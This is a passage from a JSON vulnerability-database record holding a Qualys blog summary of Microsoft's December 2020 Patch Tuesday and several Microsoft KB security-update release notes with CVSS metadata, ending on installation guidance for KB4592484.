To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-01-15T20:00:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1170", "CVE-2020-17136"], "modified": "2021-01-15T20:00:13", "id": "RAPID7BLOG:0165B62C20478239D1C1B73C779FA6F0", "href": "https://blog.rapid7.com/2021/01/15/metasploit-wrap-up-94/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-12-12T10:20:59", "description": "This month\u2019s Microsoft Patch Tuesday addresses 58 vulnerabilities with 9 of them labeled as Critical. The 9 Critical vulnerabilities cover Exchange, SharePoint, Hyper-V, Chakra Scripting, and several other workstation vulnerabilities. Adobe released patches today for Experience Manager, Prelude, Lightroom and [pre-notification security advisory for Acrobat and Reader](<https://blogs.adobe.com/psirt/?p=1957>).\n\n### Workstation Patches\n\nToday\u2019s Patch Tuesday fixes vulnerabilities that would impact workstations. The Office, Edge, Chakra vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. 
This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Exchange RCE\n\nMicrosoft patched five Remote Code Execution vulnerabilities in Exchange ([CVE-2020-17141](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17141>), [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17142>), [CVE-2020-17144](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17144>), [CVE-2020-17117](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17117>), [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17132>)), which would allow an attacker to run code as system by sending a malicious email. Microsoft does rank them as \u201cExploitation Less Likely,\u201d but due to the open attack vector, these patches should be prioritized on all Exchange Servers.\n\n### SharePoint RCE\n\nMicrosoft patched two RCEs ([CVE-2020-17121](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17121>) and [CVE-2020-17118](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17118>)) in SharePoint. [CVE-2020-17121](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17121>) allows an authenticated attacker to gain access to create a site and execute code remotely within the kernel. Because of this, it is highly recommended to prioritize these patches across all SharePoint deployments.\n\n### Hyper-V RCE\n\nMicrosoft also patched an RCE vulnerability in Hyper-V ([CVE-2020-17095](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17095>)) which allows an attacker to run malicious programs on a Hyper-V virtual machine to execute arbitrary code on the host system when it fails to properly validate vSMB packet data. 
This should be prioritized on all Hyper-V systems.\n\n### Windows NTFS RCE\n\nWhile listed as Important, there is an RCE vulnerability ([CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>)) in Microsoft Windows. A local attacker could exploit this vulnerability to elevate the attacker's privileges or a remote attacker with SMBv2 access to an affected system could send malicious requests over the network. \n\n### Windows Lock Screen Security Bypass\n\nAn important vulnerability is patched by Microsoft ([CVE-2020-17099](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17099>)) where an attacker with physical access to the target system could perform actions on a locked system, thereby executing code from the Windows lock screen in the context of the active user session. This patch should be prioritized across all Windows devices.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Adobe Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb20-72.html>), [Lightroom](<https://helpx.adobe.com/security/products/lightroom/apsb20-74.html>), [Prelude](<https://helpx.adobe.com/security/products/prelude/apsb20-70.html>) and [Pre-notification Security Advisory for Acrobat and Reader](<https://helpx.adobe.com/security/products/acrobat/apsb20-75.html>). 
The patches for Experience Manager and Acrobat/Reader are labeled as [Priority 2 ](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>).", "cvss3": {}, "published": "2020-12-08T20:26:44", "type": "qualysblog", "title": "December 2020 Patch Tuesday \u2013 58 Vulnerabilities, 9 Critical, Windows Exchange, Hyper-V, SharePoint, Adobe", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17099", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "modified": "2020-12-08T20:26:44", "id": "QUALYSBLOG:D6BB8795D96ECAD5C95596F19210BB13", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-12-31T15:44:36", "description": "None\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. 
For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Graphics, Windows Peripherals, and Windows Core Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. 
\n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592495>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4592495](<https://download.microsoft.com/download/8/b/7/8b77686d-a973-44ac-a9c2-6befa7c874a4/4592495.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592495 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592495", "href": "https://support.microsoft.com/en-us/help/4592495", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T15:44:38", "description": "None\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. 
For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Graphics, Windows Peripherals, and Windows Core Networking.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. 
This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592497>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592497](<https://download.microsoft.com/download/2/4/5/245216d1-63c7-40b2-ab27-94e0e7be4bc8/4592497.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592497 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592497", "href": "https://support.microsoft.com/en-us/help/4592497", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T15:44:30", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release 
channels. We recommend that you update your devices to the latest security quality update. \n\n**UPDATED 12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1803 update history home page.\n\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n## Highlights\n\n * Updates to improve security when using Microsoft Edge Legacy.\n * Updates to improve security when using Microsoft Office products.\n * Updates an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. 
Key changes include:\n\n * Addresses an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n * Security updates to Microsoft Edge Legacy, the Microsoft Graphics Component, Windows Media, Windows Fundamentals, and Windows Virtualization.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4580398) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592446>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592446](<https://download.microsoft.com/download/8/5/5/85523697-c83a-482e-ba5f-36ecbf32bbc5/4592446.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592446 (OS Build 17134.1902) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592446", "href": "https://support.microsoft.com/en-us/help/4592446", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T15:44:39", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. 
\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 SP1 and Windows Server 2008 R2 SP1 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Graphics, Windows Peripherals, Windows Storage and Filesystems, and Windows File Server and Clustering.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website. \n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. 
This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. 
The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the _latest_ SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). 
For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592503>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592503](<https://download.microsoft.com/download/6/a/9/6a9abff1-e04b-45dd-970c-bac930fa86f0/4592503.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592503 (Security-only update)", 
"bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592503", "href": "https://support.microsoft.com/en-us/help/4592503", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:06:00", "description": "None\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). 
To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4586845](<https://support.microsoft.com/help/4586845>) (released November 10, 2020) and addresses the following issues:\n\n * Addresses an issue in which PDF24 Creator version 9.1.1 cannot open .txt files.\n * Security updates to Windows Graphics, Windows Peripherals, and Windows Core Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. 
For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592484>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4592484](<https://download.microsoft.com/download/d/c/f/dcf120c1-0eb2-4b07-976d-75c1ccb3efcc/4592484.csv>). 
